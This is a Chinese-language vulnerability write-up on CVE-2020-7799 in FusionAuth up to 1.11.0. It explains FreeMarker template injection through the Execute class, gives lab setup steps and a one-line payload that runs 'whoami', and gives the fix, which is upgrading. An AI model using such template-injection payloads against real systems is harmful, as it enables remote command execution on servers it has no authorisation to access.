本文字数:718
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负
0x01 简介
FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。
0x02 漏洞概述
一个有修改 email 或者 theme 模板权限的用户可以通过使用 Apache FreeMarker engine 里的 freemarker.template.utility.Execute 来执行任意命令。
因为使用了Apache FreeMarker engine(freemarker-2.3.28.jar), 所以可以使用 freemarker 的语法, 类似 ${XXX? Built-ins}
而 new 这个 Built-ins 会 创建一个特定 TemplateModel 的 变量。
要求?
左边是TemplateModel,也就是 freemarker.template.utility.Execute, 而右边就是 initialize 这个 object 时的参数。
0x03 影响版本
FusionAuth <= 1.11.0
0x04 环境搭建
下载 FusionAuth 1.10.0(本次使用 FusionAuth 1.10.0 进行测试)
https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-app-1.10.0.zip
/etc/init.d/mysql start
systemctl start elasticsearch.service
bin/startup.sh
http://127.0.0.1:9011/
配置 FusionAuth0x05 漏洞复现
本次使用 email template 进行测试
emailTemplate.defaultHtmlTemplate
为
${"freemarker.template.utility.Execute"?new()("whoami")}
0x06 修复方式
值得一提的是 freemarker 2.3.19 的 changelog 里显示,如果用户开启了 TemplateClassResolver.SAFER_RESOLVER 的话, 可以防止创建 freemarker.template.utility.Execute. 然而目前这并不是默认配置。
FusionAuth Version 1.11.0 的 release Note 里说是修改了 freemarker template engine, 使其不能执行恶意代码. 所以修复方式就是升级到1.11.0 及以后的版本。
参考链接:
https://www.anquanke.com/post/id/198036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7799
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!